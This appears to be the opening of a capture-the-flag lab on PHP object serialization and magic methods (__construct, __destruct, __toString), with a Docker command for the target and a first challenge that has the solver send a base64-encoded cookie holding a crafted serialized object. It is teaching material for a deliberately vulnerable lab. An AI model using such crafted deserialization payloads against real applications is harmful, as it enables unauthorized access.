
IP Address: 172.25.200.200
Port: 9047
Would you like to run the target Docker image locally?
sudo docker run -d --restart always -p 9047:80 --name Flag-red65-67 joshbeck2024/ctf-php-serialization-part-2-flag-red65
- Object serialization in PHP is the process of converting an object into a storable or transmittable format, typically a string, so it can be saved in a file, sent over a network, or stored in a database. Later, the object can be reconstructed by deserializing it, restoring its state and properties. This is useful for maintaining object state across sessions or during communication between systems.
Lab Objective:
- In Part 1, we looked at the structure of a serialized object and what happens when a data structure is serialized/deserialized.
- In this lab, we’ll tackle 3 flags that are designed to introduce the concept of ‘
Magic Methods.’
- If you know when and under what conditions these special ‘Magic Methods’ are triggered, it makes a huge difference when participating in CTF challenges or conducting real-world static code analysis.
In PHP, Magic Methods are special functions that are automatically triggered by certain events rather than being called manually by your code.
- You can recognize them (in PHP) because they always start with a double underscore (e.g.,
__construct, __destruct, and __toString).
Lab summary:
Flag Red65: We’ll look at the __construct() method and determine the conditions under which it is triggered.
Flag_Red66: We’ll look at the __destruct() method and learn about reference checks.
Flag_Red67: We’ll look at the __toString() method and determine the conditions under which it is triggered.
Flag Red65:

The Challenge:
- Super Easy, but hopefully informative this time:
- Hand the application a base64-encoded cookie containing a serialized object with
s:5:”color”;s:12:’”give_me_flag”;
- This syntax should make sense to you after working through Part 1.
